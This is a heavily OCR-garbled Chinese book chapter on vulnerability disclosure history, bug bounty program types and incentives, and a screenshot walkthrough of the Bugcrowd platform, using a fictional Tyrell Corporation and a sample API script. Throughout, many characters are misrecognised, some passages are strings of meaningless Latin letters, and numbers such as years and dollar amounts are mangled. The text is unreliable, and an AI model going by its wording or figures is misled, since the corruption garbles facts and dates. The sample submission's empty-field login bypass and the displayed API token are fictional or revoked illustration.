行 研究 ， 恶 意 攻 击 者 可 能 在 漏洞 公布 前 获悉 问题 ， 并 开始 利用 漏洞 攻击 用 户 。 和 上 
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9.1.3 fATRTEBUIRSR7I IN 


前 面 讨论 了 两 种 极端 方式 : 完全 回 供 应 商 披露 以 及 完全 辐 公 众 披露 。 现 在 分 析 
一 种 介 于 两 者 之 间 的 方法 : 负 贡 任 的 披露 方式 。 某 种 程度 上 ，Rain Forest Puppy 的 上 
述 做 法 同 这 个 方 同 到 出 了 第 一 步 ; 在 那 种 做 法 中 ，Rain Forest Puppy 给 软件 供应 两 一 
周 的 时 间 来 建立 有 意义 的 沟通 ， 只 要 处 于 沟通 期 限 内 ， 就 不 会 回 公 众 漏洞 。 这 样 ， 
可 在 研究 人 员 和 供应 丙 之 间 形 成 一 种 妥协 , 只 要 供应 商 肯 合作 , 研究 人 员 也 会 配合 。 
这 种 中 庸 之 道 似 乎 不 错 ， 征 披露 漏洞 的 新 方法 。 

2007 年 ，Microsoft 的 Mark Miller 下 式 要 求 及 用 负 贡 任 的 披露 方式 。Mark Miller 
列 出 了 原因 ， 包括 需要 为 供应 商 (如 Microsoft) 留 出 时 间 来 完全 修改 问题 和 外 围 代码 ， 
从 而 尽量 减少 补丁 数量 过 多 带 来 的 问题 .Miller 的 话 讲 得 很 漂亮 ,但 其 他 人 则 争辩 道 ， 
如 采 和 人 微软 和 其 他 公司 这 么 长 时 间 没 有 忽视 补丁 程序 ， 道 德 黑 客 们 融 不 会 在 第 一 时 间 
回 公 众 披露 漏洞 。 在 这 些 和 争辩 的 人 看 来 ,“ 负 责任 的 拔 露 方式 ” 偶 问 供应 商 一 方 ， 其 
隐 舍 的 意思 是 : 如 采 人 研究 人 员 采 取 其 他 方式 ,供应 商 概 不 人 氏 员 。 微软 后 来 做 出 让 步 ， 
于 2010 年 提出 男 一 个 要 求 ， 改 用 术语 “CVD(Coordinated Vulnerability Disclosure, t) 
调式 漏洞 披露 )”。 与 此 同时 ，Google 抢 了 风头 ， 声 称 在 披露 前 修复 任何 安全 问题 的 
硬性 截止 时 间 是 60 天 。 这 好 像 是 针对 Microsoft 的 ，Microsoft 有 时 花费 超过 这 么 长 的 
时 间 修 复 问 题 。 在 2014 年 ，Google 成 并 了 Project Zero BA, AEA HAE is 
词 ， 并 将 宽 限 期 定 为 90 天 。 

负责 任 的 拆 露 方式 的 特点 依然 是 : 在 一 段 合理 的 时 间 后 披露 威胁 。 为 应 对 Morris 
Hu. ENU BB (Computer Emergency Response Team，CERT)/ 协 调 中 心 
(Coordination Center，CC) 于 1988 年 成 立 ， 近 30 年 来 ， CERT/CC 一 直 促 进 漏洞 公布 和 
伞 丁 发 布 。CERT/CC 在 处 理 漏 润 报 告 时 ， 确 定 的 壳 限 期 定 为 45 天 ， 这 个 期 限 过 后 ， 
CERT/CC 将 癌 公 众 扳 圳 漏洞， 只 有 极 个 别 情况 除外 。 安 全 研究 人 员 可 将 漏洞 提交 给 
CERT/CC 或 其 代理 ，CERT/CC 将 与 供应 商 进 行 协 调 。 在 补丁 出 现 后 ， 或 在 45 天 宽 限 
期 过 后 ， 将 上 发布 漏洞 。 


9.1.4 有 峙 没有 免费 的 Bug 


前 面 讨 论 了 完全 回 供 应 商 披露 、 完 全 癌 公 众 披露 以 及 负责 任 的 披露 方式 。 所 有 
这 些 披露 方式 都 是 免费 的 ， 即 安全 人 员 耗 费 漫 长 的 时 间 找 到 安全 漏 铜 ， 不 是 为 了 获 
取经 鹿 补 偿 ， 而 是 为 了 公众 利益 而 公开 漏洞 。 

2009 年 ， 游 戏 规 则 改变 了 。 几 个 兰 名 的 灰 帆 黑客 一 一 Charlie Miller. Alex 
Sotirov 和 Dino Dai Zovi 在 一 年 一 上 度 的 CanSecWest 会 议 上 上， 展现 了 一 个 新 姿态 ， 他 
们 三 个 市 头 举 起 纸 脾 : “再 没有 人 免费 的 Bug”。 此 前 ， 人 研究 人 员 束 开始 呼吁 。 研 究 
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人 员 为 研究 和 发 现 漏洞 需要 花费 漫长 的 时 间 ， 却 得 不 到 回报 ， 两 者 不 成 比例 。 并 
非 安全 领域 的 所 有 人 士 都 同意 这 种 说 法 ， 更 有 一 些 人 公开 进行 反击。 还 有 一 些 实 
用 主义 者 认为 ， 虽 然 这 三 位 研究 人 员 已 经 捞取 了 “社会 资本 ”， 可 借 此 索要 高 额 
顾问 费 ， 但 是 其 他 研究 人 员 则 需要 继续 免费 公开 漏洞 ， 一 无 所 获 。 无 论 如 何 ， 这 
种 新 的 情绪 表达 在 安全 领域 引发 了 冲击 。 它 给 予 一 些 人 力量 , 也 给 另 一 些 人 造成 
恐慌 。 毫 无 疑问 ， 在 安全 领域 ， 天 平 从 供应 商 一 方向 研究 人 员 一 方 移动 了 一 些 。 


9.2 i88 es SV X 


199$ 年 ， Netscape 通 信人 公司 的 Jarrett Ridlinghafer?8 — REH RIE ^ giis] 94 az (Bug 
BountVy ”。 与 此 同时 ，iDefense( 后 来 被 VeriSign 收 购 ) 和 TippingPoint 通 过 在 研究 人 员 
和 供应 商 之 间 扮 福 中 间 人 人 角色， 促进 信 息 交 斌 和 获得 报酬 ， 推 动 了 贫 金 计划 。2004 
年 ，Mozilla Foundation 7JFirefox ££ ^7. f T$ it kl. 2007*E, CanSecWest Ja 34 I] 
Pwn2Own st Fe MN KA UA] Sc ea. KEWAA n] ORDRE Ac BUR TRE Di A] EA ROT RS 
洞 的 攻击 ， 获 得 奖金 和 现金 。 后 来 ，Google 于 2010 年 ，Facebook 于 2011 年 启动 计划 ， 
Microsoft 也 在 2014 年 月 动 了 Microsoft Online Services 计 划 。 目 前 ， 已 经 有 数 百 家 公司 
为 漏洞 发 现 者 提供 车 金 。 

软件 供应 商 的 “漏洞 赏 金 计 划 ” 概 念 间 在 以 负责 的 方式 啊 应 漏洞 问题 。 毕竟 ， 
在 最 佳 情况 下 ， 通 过 利用 安全 研究 人 员 的 工作 ,公司 可 节省 大 量 用 于 奏 找 漏 铜 的 
时 间 和 金钱。 男 一 方面 ， 在 最 糟 料 的 情况 下 ， 如 果 对 安全 研究 人 员 的 报告 处 理 不 
当 ， 贸 然 公 布 出 去 ， 公司 将 不 得 不 花费 大 量 时 间 和 金钱 去 控制 危害 。 于 是 出 现 了 
这 种 有 趣 而 脆弱 的 经 鹿 模 式 ， 软 件 供 应 商 和 开发 人 员 都 有 兴趣 和 动力 一 直 合作 
FE. 


9.2.1 i 3 EITRI 

存在 多 种 漏洞 赏 金 计 划 ， 包 括 公 司 、 政 府 、 非 公开 、 公 开 和 开源 形式 。 

1. 公司 和 政府 

有 多 家 公司 (包括 Google、Facebook、Apple 和 Microsofb 在 直接 运营 上 自己 的 漏洞 
贫 金 计划 。 最 近 ，Tesla、United、GM 和 Upber 也 局 动 了 各 目的 计划 。 这 种 情况 下 ， 研 
究 人 员 与 公司 直接 交流 。 如 本 章 前 面 所 述 ， 每 家 公司 对 漏洞 黄金 计划 的 看 法 不 套 相 
同 ， 计 划 的 实施 方式 也 不 同 ， 因 此 ， 对 研究 人 员 的 激励 程度 也 是 不 同 的 。 政 府 也 参 
与 进来 ， 如 美国 政府 于 2006 年 司 动 了 一 个 成 功 的 漏洞 黄金 计划 ， 访 计划 为 期 24 天 。 
大 约 有 1400 名 黑客 发 现 了 138 个 前 所 未 知 的 漏洞 ， 发 放 的 黄金 数额 是 7$ 000 美 元 。 由 
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于 这 些 计划 具有 一 些 独 有 的 特征 ， 研 究 人 员 需 要 认真 阅读 计划 条 款 ， 然 后 决定 是 否 
在 发 布 前 与 公司 或 政府 合作 。 


2. JEFF 


一 些 公司 直接 或 通过 第 三 方 设 置 了 非 公 开 漏洞 员 金 计划 ， 寻 求 得 到 一 个 有 资质 
的 小 型 研究 团队 的 帮助 。 这 种 情况 下 ， 公 司 或 第 三 方 需要 对 研究 人 员 的 资质 进行 审 
核 ， 此 后 邀请 他 们 参与 进来 。 非 公开 漏 铜 黄金 计划 的 价值 在 于 报 和 的 保密 性 (从 供应 
商 的 角度 看 ) 以 及 参与 人 员 数 量 有 限 ( 从 研究 人 员 的 角度 看 )。 研 究 人 员 面临 的 一 个 挑 
战 是 ， 他 们 必须 不 知 疫 倦 地 工作 ， 以 求 上 友 现 漏洞 ， 但 当 他 们 真 正 找 到 漏洞 时 ， 却 得 
知 该 漏洞 此 前 已 被 他 人 发 现 。 供 应 商 认为 这 是 “ 香 复 友 现 ”， 这 样 的 发 现 不 符合 领取 
员 金 的 条 件 。 非 公开 计划 降低 了 这 种 可 能 性 。 不 过 ， 此 类 计划 存在 缺点 : 参与 的 研 
完 人 员 数 量 不 多 ， 有 些 漏洞 可 能 示人 锌 报告， 供应 商会 产生 虚假 的 安全 感 ， 而 这 比 没 
有 安全 感 还 糟糕。 


3. 公开 


公开 的 漏洞 黄金 计划 上 自然 是 公开 的 。 也 就 是 说 ， 任 何 研究 人 员 都 可 以 参与 提交 
报告 。 此 类 情况 下 ,公司 要 么 直接 宣布 漏洞 贡 金 计划 ,要 么 通过 第 三 方 宣布 该 计划 ; 
此 后 公司 便 从 等 报告 。 相 对 于 非 公开 计划 ， 此 类 计划 的 好 处 很 明显 : 参与 的 研究 人 
员 数 量 更 多 ， 会 及 现 更 多 漏 铜 。 但 另 一 方面 ， 只 有 最 早 友 现 漏 铀 的 研究 人 员 才 能 获 
炎 ， 一 些 最 优秀 的 研究 人 员 因 此 而 转 问 ， 更 愿意 参与 非 公开 漏 调 黄金 计划 。2015 年 ， 
Google _ Chrome 团队 神 破 重重 阻力 ， 制 定 了 一 个 公开 漏洞 贯 金 计 划 ， 为 Chrome 浏 抽 
器 提供 了 一 个 未 设 上 限 的 赏 金池 。 而 在 此 之 前 ， 研 究 人 员 必 须 在 一 天 的 时 间 内 在 
CanSecWest 展 开 竞 争 ， 而 且 贫 金池 是 有 上 限 的 。 现 在 ， 研 究 人 员 全 年 都 可 以 提交 漏 
洞 ， 而 且 赏 金池 没有 上 限 。 当 然 ，Google 公 告 中 最 后 的 法 律 条 文 指出 : 该 计划 处 于 
尝试 阶段 ，Google 可 随时 对 其 进行 更 改 。 公 开 的 漏洞 赏 金 计 划 自 然 最 受 关注 ， 很 可 
eS — BAPE FR. 


4. FoR 


为 保护 开源 软件 ， 相 应 举措 也 被 采用 了 。 一 般 而 言 ， 开 源 项 目 没 有 资金 支持 ， 
因此 缺少 资源 来 处 理 安 全 漏洞 ， 无 论 这 些 漏 铜 是 内 部 人 员 肥 现 的 还 是 其 他 人 员 友 现 
的 。 开源 技术 改进 基金 (Open Source Technology Improvement Fund, OSTIF) 就 是 这 样 
一 项 文 持 开源 社区 的 计划 。OSTIF 由 个 人 和 团体 资助 ， 旨 在 提高 其 他 人 使 用 的 软件 
的 质量 。 文 持 形 式 包括 提供 Bug 员 金 ， 直 接 为 开源 项 目 提供 资金 ， 注 入 资源 修复 问 
题 , 以 及 安排 专业 审计 。 支持 的 开源 项 目 包括 备 受 推 深 的 OpenSSL 和 OpenVPN 项 目 。 
这 些 基 础 项 目 者 是 条 局 的 事业 ， 值 得 研究 人 员 为 之 投入 时 间 ， 也 值得 社会 各 届 人 士 
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捐助 支持 。 


Ww 


\_S” 国 公民 的 免税 捐赠 ， 


9.22 激励 措施 


漏洞 黄金 计划 提供 很 多 官方 的 和 非 官 方 的 激励 措施 。 在 早期 ， 回 报 包 括 信 件 、 
I 恤 、 礼 品 卡 ， 当 然 也 可 能 只 是 获得 虫 焰 的 资本 。 到 了 2013 年 ， 社 区 认为 Yahool! 的 
奖品 过 于 宕 酸 ， 开 始 攻 击 Yahool， 反 映 汤 洞 报告 获得 的 回报 应 当 不 只 是 T 恤 和 匿名 
礼品 卡 。 在 给 社区 的 公开 信 中 ，Yahoo! 公 司 的 “Bug 发 现 ” 总 监 Ramses Martinez 
解释 说 ， 他 一 直 在 目 掏 腰包 资助 该 计划 。 从 那 时 起 ，Yahoo! 为 有 效 报 告 提供 的 筑 
金 从 1$0 美 元 提高 到 15$ 000 美 元 。 从 2011 年 到 2014 年 ，Facebook 提 供 了 极 具 特色 的 
AERA” VISAE F. REAR ROSAE, BREF, HEAR 
在 参加 安全 会 议 时 ， 会 得 到 认可 ， 并 可 能 受 邀 参加 晚会 。 现 在 ， 漏 洞 黄金 计划 仍 提 
GE EG i, CLF RASCH GT A RAS FE SAR IPS BIA. RRR). INF ANZ GF 
AME. 
9.2.3 ”围绕 漏洞 党 金 计划 的 争议 

并 不 是 每 个 人 都 赞成 漏洞 员 金 计划 ,因为 计划 存在 一 些 具 有 争议 的 问题 。 例 
如 ， 供 应 商 可 能 使 用 这 些 平 台 对 研究 人 员 进 行 分 级 , 但 研究 人 员 无 法 对 供应 商 进 
行 分 级 .有些 漏 铜 黄金 计划 用 于 收集 报告 ,但 供应 商 并 未 与 研究 人 员 进 行 尽 好 沟 
通 。 另 外 ， 也 很 难 确定 所 谓 的 “重复 及 现 ”是 不 是 真实 崔 硝 。 评 分 系统 也 是 随意 
设置 的 ， 不 能 准确 有 反映 汤 洞 披 圳 的 价值 ， 给 出 的 只 是 报告 在 “黑市 ”上 的 价值 。 
因此 ， 每 个 研究 人 员 都 需要 确定 漏洞 黄金 计划 是 人 否 适 合 日 己 ， 并 权衡 利 阁 。 


9.24 MAJMA Sz YT X AE XE 
己 经 出 现 了 促进 漏洞 黄金 计划 的 几 家 公司 。 下 面 的 三 家 此 类 公司 成 立 于 2012 人 年: 


e Bugcrowd 


e HackerOne 
e SynAck 
XX JLZCA REB. KBAR STAR AYA], BUBugcrowd. 


cy $B: OSTIF 是 美国 政府 注册 的 501(c)(3) 非 营利 项 目 ， 因 此 有 资格 接受 美 
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9.3 Bugcrowdiff£ 


Bugcrowd 是 领先 的 负责 接收 和 管理 漏洞 的 众 包 平台 。 捷 文 持 多 关 漏 洞 员 金 计 

划 ， 包 括 非 公 开 计 划 和 公开 计划 。 非 公开 计划 不 对 大 众 公 开 ， 但 Bugcrowd 维 护 一 个 

由 顶级 研究 人 员 组 成 的 骨干 团队 ， 这 些 人 员 已 在 平台 上 证 明了 自己， 他 们 可 基于 提 

供 的 标准 邀请 其 他 很 多 人 员 加 入 计划 。 为 了 参与 非 公 开 计 划 ， 研 究 人 员 必 须 经 由 第 
三 方 组 织 进行 身份 验证 。 与 此 相反 ， 在 公开 计划 中 ， 研 究 人 员 可 自由 地 提交 报告 。 
MADE 就 能 在 "a LN 继续 参与 漏洞 员 金 计划 。 

， 如 果 研 究 人 员 违 反 平 台 条 秋 或 部 分 漏 稠 员 金 计划 ， 将 被 逐 出 网 络 ， 同 时 背 失 
d 金 的 机 会 。 KIISE HEN A EA TE EMT ITA Ua PA B BAR AF VS D], AK, 

“黑客 终归 要 发 动 攻 击 ” 但 至 少 ， 这 样 清楚 地 呈现 规则 ， 使 双方 都 有 心理 准备 ， 不 

会 感到 意外 。 


Y NN 警告 : CREF, FIARA Bugcrowd ie 354535]. 


Bugcrowd 还 允许 研究 人 员 获 得 两 类 补偿 : BUONA. EWE TT XU. £v. 
一 个 资金 池 ， 由 程序 所 有 者 按照 可 配置 的 标准 分 配给 所 交 者 。 采 誉 计划 不 涉及 资 
金 ， 却 为 研究 人 员 提 供 了 炫 泪 的 机 会 ， 相 关 研 究 人 员 可 以 积累 采 誉 ， 在 平台 上 起 
越 其 他 研究 人 员 。 另 外 ，Bugcrowd 使 用 分 级 系统 ， 邀 请 一 组 选中 的 研究 人 员 加 入 非 
AR DR lel EX pz VT dal e 

Bugcrowd Web 界 面 有 两 个 部 分 : 一 部 分 供 程序 所 有 者 使 用 ， 男 一 部 分 供 研究 人 
员 使 用 。 


9.3.1 程序 所 有 者 Web 静 面 
程序 所 有 者 Web 界 面 是 一 个 RESTful 界 面 ， 可 自动 管理 漏洞 赏 金 计 划 。 
1. (Summary) 


漏洞 黄金 计划 的 第 一 个 屏 硕 是 Summary( 概 要 )， 如 图 9-1 所 示 。 其 中 突出 显示 尚 
未 鉴别 和 分 级 的 提交 数量 。 在 本 例 中 ，5 个 提交 报告 尚未 分 类 。 其 他 统计 数字 表示 已 
经 鉴别 和 分 级 的 条 月 数 量 (to review) FRIAR H KE (to fix) 以 及 已 解决 的 条 目 数 
量 (fixed)。 屏 幕 底 部 显示 活动 的 动态 日 志 。 
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Tyrell Corporation 


Tyrell Corporation 


E 5processing B 0 to review JF 0 to fix 0 fixed 
Recent activity Your assigned submissions 
rick-deckard submitted Admin interface for Tyrell's Malntrame nternet accessible 


E rick-deckard submitted Telnet enabled on Replicant 


E rick-deckard submitted Ability ta brute force Mainframe login form 
图 9-1 Summary BEA 
2. 提交 (Submissions) 


程序 所 有 者 Web 界 面 的 下 一 个 屏幕 是 Submissions( 提 交 )， 如 图 9-2 所 示 。 在 屏幕 
左 侧 可 看 到 提交 队列 和 优先 级 。 优 先 级 包括 P1( 关 键 )、P2( 高 )、P3( 中 等 )、P4( 低 )、 
P5( 供 参考 )， 如 图 9-2 所 示 。 


Tyrell Corporation Submissions 


© Authentication Bypass in Mainframe Interface 


There is an authentication er the mainframe application that allows easy access to the Tyrell 
stem. Gaining access to the mainframe application allows access to sensitive 


n Replicant data 
[e1] Authentication Bypass in Mainframe Interface 


rijali a ac! Ericiay af 127 DA 
rick-deckard * Last Friday at 1:37 PM Steps to Reproduce 


Ability to send commands from a Replicant to other * Access the Tyrell Corporation mainframe @ mainframe://tyrell.corp/admin 
li : 
Heinan i * On the username/password prompt, leave both fields empty. 


* You should be logged in as an admin user into the mainframe's interface. 


Ability ta brute farce Mainframe login form 


2bB0b67Jed858bb27b85ac8ae3c2412aa86267r198185220e20135ec85daadc4 re 


: Telnet enabled on Replicant raken Authentication and Session Management > Authentication Bypass > Vertica 


[Ps Admin interface for Tyrell's Mainframe is internet 
accessi ble 


19-2  SubmissionsBf 4 


中 间 的 寄 局 对 提交 交 项 进行 描述 ， 还 列 出 元 数据 及 附件 。 屏 项 右 侧 是 总 体 提 区 状 
态 的 更 新 信息 。 这 里 ，Open 状 态 级 别 是 New、Triaged 和 ，Closed 状 态 级 
Jl zc Resolved. Duplicate. Out of Scope, Not Reproducible, Won’t Fix Not Applicable. 
在 屏幕 的 这 一 侧 ， 还 可 以 调整 提 区 项 的 优先 级 ， 将 提交 项 分 配给 小 组 成 员 ， 以 及 给 
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BIA ARX. 
3. 研究 人 员 (Researchers) 


可 选择 顶部 的 Researchers 选 项 卡 碍 看 研 NDA o 图 9-3 显 示 了 这 个 选项 卡 。 可 以 
看 到 ， 只 有 一 位 研究 人 员 参 与 了 漏 铜 员 金 计划 ， 访 研究 人 员 提 交 了 5 项 。 


Tyrell Corporation Researchers (S) 


1 5 0 


Researchers submitted Submissions in total Valid submissions 


Participating Researchers 


Need Help? 
USERNAME . | | ||| VA v TOT o 
rick-deckard ort t i i | 
0 5 4 days age Cur support inam is available 9am to 5pm, Monday to 
United States af America Friday PST. Please send us an email if you need 
assistance! 


图 9-3 ”Researchers 选 项 卡 
4. 给 研究 人 员 发 奖 (Rewarding Researchers) 


当 程 序 所 有 者 选择 赏 金 时 , 可 在 右 侧 看 到 一 个 赏 金 列表 , 这 个 列表 是 可 配置 的 。 
在 图 9-4 所 示 的 示例 中 ， 给 研究 人 员 发 奖 1500 美 元 。 


submissions 


Add Reward 
"ay rick-deckard for their hard work. 


rick-deckard will be noted of the reward and a 


payment will be scheduled immediately, Make 


sure you are happy before proceed ing! 


图 9-4 给 研究 人 员 发 奖 1500 美 元 
5. 奖励 (Rewards) 


通过 选择 顶部 的 Rewards 选 项 卡 ， 将 看 到 和 黄金 汇总 信息 。 在 图 9-$ 所 示 的 例子 中 ， 
可 通过 平台 管理 贫 金 地， 所 有 黄金 和 文 付 交易 都 由 Bugcrowd 处 理 。 
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Tyrell Corporation 


$1,500.00 total rewarded in last 7 days A $1,500.00 from previous 7 days 7 Days 14 Days 


$1,500 $1,500.00 $18,500 


Highest Rewarded Submission Average Reward Remaining Prize Pool 


Transaction History 


图 9-5 Rewards 选 项 卡 
6. 洞察 (Insights) 


Bugcrowd 在 Insights 选 项 卡 中 给 程序 所 有 者 提供 关键 的 分 析 信 息 ， 如 图 9-6 所 示 。 
Insights 选 项 卡 显 示 关 键 统计 数据 ， 并 对 提交 项 进行 分 析 ， 如 目标 类 型 、 所 区 类 型 和 


Target Breakdown 
TARGET MAME BUSINESS IMPACT 


Tyrell Corporation - Mainframe Interface 


Tyrell (Corporation - Replicant Remote Interface be m 


Submission Type and Severity 
A look into the type of submissions received by T 


VULHERABLITY TYPE (TOP LEVEL CATEGORY) Technical Severity 


Server Security Miscanfiguration 
Broken Authenticatian and Session Management 
Missing Function Level Access Contra 


Network Security Misconfiguration 
Low International 


图 9-6 Insights m- 
7. 已 解决 的 状态 (Resolved Status) 
当 程 序 所 有 者 解决 一 个 问题 ， 或 裁决 一 个 问题 后 ， 可 在 提交 项 明细 汇总 的 右 侧 


选择 一 个 新 状态 。 在 图 9-7 所 示 的 例子 中 ,提交 状态 标记 为 RESOLVED， 从 而 可 以 有 


效 地 关闭 这 个 问题 。 
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Tyrell Corporation Submissions 


RESOLVED 


5 IIS ns 4 = s | = eA 
sanc submissions Authentication Bypass in Mainframe Interface pF 
100% - rick-deckard = ist Friday at 1:37 PM 
STALE 
ALL W 
There is an authentication bypass in the mainframe application that allows easy access to the Tyrell 
SOHIT HY ** ASSIGHEDTO * SOURCE +% 


Corporation's mainframe system. Gaining access to the mainframe application allows access to sensitive 
Tyrell Corporation information on Replicant data. 


国 Authentication Bypass in Mainframe Interface 


100% - rick-deckard + Last Friday at 1:37 PM Steps to Reproduce: 

"7| Ability to send commands from a Replicant to other * Access the Tyrell Corporation mainframe @ mainframe://tyrell.corp/admin 
Replicants i " 

pl * On the username/password prompt, leave both fields empty. 
UUM = rick-deckard = Last Friday at T52 PM : 
* Click submit. 
:3| Ability te brute force Mainframe login form * You should be logged in as an admin user into the mainframe's interface. 
D09& = rick-deckard « Last Friday at 1:56 PM T ul . M VM 
'"eterence Number 7bBÜüb67dedoGb6Gbb? 7b935actae8c7412aa676715439185270e70135ecB5daadcád 74 
pal Telnet enabled on Replicant VRT vue Broken Authentication and Session Management > Authentication Bypass > Vertical p 
10034 = rick-deckard = Last Friday at 2:03 PM 
Tyrell Corporation = Mainframe Interface — Website — High Impact Fd 

Pa] Admin interface for Tyrell's Mainframe is internet . i E 
DELE ] 
accessible CRI lid 

TOs = rek- docka = Last Friday at 2:08 Phi ion j ' 

* 


= Reply to rick-deckard or Leave a Team Note 


图 9-7 RESOLVED 状 态 
8. API 访问 设置 (API Access Setup) 


为 程序 所 有 者 提供 Bugcrowd 功 能 的 API(Application Programming Interface, 应 用 
程序 编程 接口 )， 如 图 9-8 所 示 。 要 设置 通过 API 访 ; » FERRARA EAA Pose rdc 
择 API Access。 然 后 为 API 提 供 名 称 ， 创 建 API 标 1 


AP] Access 


API Access 
Need Help? 


Application name Documenta 


Test- API Our support team is available Sam to 5pm, Monday to 
Friday PST. Please send us an email if you need 
assistance! 


(© CREATE THE FIRST API CREDENTIALS —— 


Manage API Credentials 


API 标 记 被 提供 给 程序 所 有 者 ， 只 显示 在 如 图 9-9 所 示 的 屏幕 中 。 研 究 人 员 需 要 
记录 该 标记 ， 因 为 该 标记 不 会 显示 在 这 个 屏幕 以 外 的 其 他 地 方 。 


注意 : 此 处 显示 的 标记 已 被 撤消 ， 不 再 可 用 。 请 与 Bugcrowd 联 系 ， 建 立 自 
己 的 计划 ， 并 创建 API 密 钥 (Key)。 
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API Access 
Need Help? 


Lecumentatoan 


important 

The token will not be accessible after navigating away from this page. Our support team is available 9am to 5pm, Monday to 
Friday PST. Please send us an email if you need 
assistance! 


New API token for Test-API ——— 


support@bugcrowd.com 
HTTP Basic Authentication Username 
byakndblkr 
HTTP Basic Authentication Password 
D3kupJMuClaBlYULZlSX scaGGConJSVwÜclJlnXCBMD aeNbEwcZUK RondaMzFFKWATDK]j9p 
HTTP Authorization Header 


Authorization: Token 
byakndblkr:D3kupJMuCl8BlYULZlSX scG6ConJSVwQcJ1nXCBND aBN&Ewc2UK RondaM2FFKWA7DK j 9p 


图 9-9 ”显示 API 标 记 


9.32 程序 所 有 者 API 示 例 


程序 所 有 者 可 使 用 Curl 命 令 与 API 交 互 ， "iin //docs.bugcrowd.com/v1.0/ 


docs/authentication-v3 下载 APIX 档 来 了 解 这 一 点 。 


1. bug-crowd-api.py 封装 器 


可 从 https://github.com/asecurityteam/bug crowd client 找 到 Bugcrowd API 的 非 官 


Ti ESR tit 0 
TEZCRPipl], ARZE, W PHI: 


$ sudo pip install bug-crowd-api-client 


Zz 获取 漏洞 党 3 金 计 划 提 交 信 息 


用 上 面 的 API 密 钥 和 bug-crowd-apij 封 装 磺 ， 可 通过 编程 方式 与 提交 了 项 进行 交 
例如 ， 可 使 用 以 下 代码 ， 从 第 一 个 漏洞 黄金 计划 的 第 一 个 是 交 项 提取 描 — 


$ cat bug-crowd-api.py 

from bug crowd.client import BugcrowdClient 

client = BugcrowdClient('byokndblkr:D3kupJMuCl8BlYULZlSX | 
scG6ConJSVwQCcJ1nXC8ND a0N6Ewc2UK RondaM2FFKW47DK]j9p') 
bounties — client.get bounties() 

submissions — list(client.get submissions (bounties[0])) 
#print the name and tagline for the first bounty program 
print "Name: "+ bounties[0].get ("organization") .get ("name") 
print "Tagline: " + bounties[0].get ("tagline") 

print 至 
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#print the first submission description 

print "Submission Description: "+ submissions [0] .get ("description markdown") 
5 

$ python bug-crowd-api.py 

Name: Tyrell Corporation 

Tagline: More human than human 

kkkkkkkkkkkkkkkkk 

Submission Description: It is possible to access the Tyrell Corporation's Mainframe 
Interface admin portal through the open internet. 


$ 


可 以 看 到 ，API 封 装 堪 允许 方便 地 检索 漏 铜 黄金 计划 或 提交 数据 。 请 参阅 API 
文档 以 了 解 该 功能 的 详细 描述 信息 。 


9.33 HRARWebAH 


作为 一 名 研究 人 员 ， 如 果 被 Bugcrowd 团 队 庆 请 加 入 非 公开 漏洞 赏 金 计划 ， 将 收 
到 如 图 9-10 所 示 的 邀请 。 通 过 访问 屏幕 右上 角 的 下 拉 菜 单 ， 可 从 Invites 菜 单打 开 这 


Invited Programs Sort by: Newest v 


Please refrain from sharing information about invitation-only programs, private programs, or your submissions. 


| . Tyrell Corporation 
More human than human 


$100 - $1,500 per vulnerability Managed by bugcrowd 


9-10 ”邀请 加 入 


以 研究 人 员 映 份 加 入 Bugcrowd 后 , 将 看 到 如 图 9-11 所 示 的 选项 (可 从 主 仪表 板 访 
问 )。 可 以 单 击 quick tips 链 接 但 看 快速 提示 信息 ， 但 看 一 系列 公共 漏洞 党 金 计划 ,或 
提交 测试 报告 。 


Get started as a security researcher on Bugcrowd 


Here are some quick tips for a first-time security researcher or get started right away with our ongoing programs 


VIEW A PROGRAM LIST SUBMIT A TEST REPORT 


图 9-11 显示 的 选项 
在 提交 测试 报告 时 ， 将 转向 Hack Me! 漏 洞 赏 使 计 划 ， 这 是 一 个 供 新 研究 人 员 进 
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行 符 试 和 练习 的 沙 箱 ， 如 图 9-12 所 示 。 填 写 表单 后 单 击 Submit， 研 究 人 员 可 以 测试 
用 尸 界面 ， 了 解 在 提交 真正 的 报告 时 会 看 到 什么 。 例 如 ， 研 究 人 员 将 收 到 一 封 电子 
邮件 ， 其 中 包含 提交 项 的 链接 。 这 人 允许 研究 人 员 发 表 评论 ， 并 与 程序 所 有 者 进行 


Report a bug to 


4 2; Hack Me! 


Caption required 
T PREVIEW REPORT 


Help us get an idea of what The flux capacitor is busted. 日 
this vulnerahility is about 


Disclosure Policy 
Please note: This program 


does not allow disclosure. 


You may not release 


Select the vulnerable target hackme.bugcrowd.com information about 
Note: Targets that are not 
explicitly in scope may not 
be eligible for a reward 


vulnerabilities found in this 


program to the public. 


图 9-12 Hack Me! 漏 洞 赏 金 计 划 
9.4 iB A Im) RE 


AA tell o SE VEA Aa ATARI? 有 人 声称 ， 通 过 参与 漏 酒 
Fase TPR, BEE BDULA2 AI. BW, Kee MIMI, FRR AS. (BUDE 
说 ， 如 末 研 究 人 员 想 磨炼 日 己 的 Bug 友 现 拉 能 并 以 此 谋生， 那么 请 考虑 以 下 问题 。 


941 选择 一 个 目标 


第 一 个 考虑 事项 是 漏洞 贫 金 计划 的 目标 是 什么 。 开 始 时 ， 最 好 在 Firebounty.com 
注册 的 漏洞 黄金 计划 列表 中 搜索 。 产 品 越 新 ， 界 面 越 粗 糙 ， 研 究 人 员 找 到 前 所 未 知 
的 问题 的 可 能 性 越 大 。 记 住 ， 对 于 大 多 数 计 划 而 言 ， 只 有 第 一 份 报告 会 收 到 蓉 金 。 
Bugcrowd.com 之 类 的 站 点 经 篆 列 出 所 有 已 知 的 安全 问题 ， 切 不 可 将 自己 的 宝 贯 时 间 
REE CAAT AR eal. “RETIRE LL”, FEIN TARR H tA A) el i e 
付出 努力 的 ， 但 这 样 的 付出 是 值得 的 。 


942 ”如 有 必要 ， 进 行 注 册 


一 些 计划 要 求 注册 ， 甚 全 要 求 得 到 第 三 方 的 验证 ， 此 后 才能 参与 计划 。 注 册 过 
程 通 第 很 测 单 ， 研 究 人 员 只 需要 将 身份 证 明 副 本 及 送 给 NetVerify 等 第 三 方 即 可 。 如 
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末 研 究 人 员 不 同意 这 样 做 ， 大 可 转投 他 处 ， 有 很 多 目标 是 不 要 求 用 户 注册 的 。 


943 理解 游戏 规则 
每 个 计划 都 有 一 组 和 条款 和 和 条件， 研究 人 员 需 要 认真 阅读 。 通 第 而 言 ， 如 果 研 究 


人 员 给 一 个 漏洞 黄金 计划 提交 漏洞 报告 ， 同 时 也 将 失去 疝 第 三 方 披露 漏洞 的 权利 。 
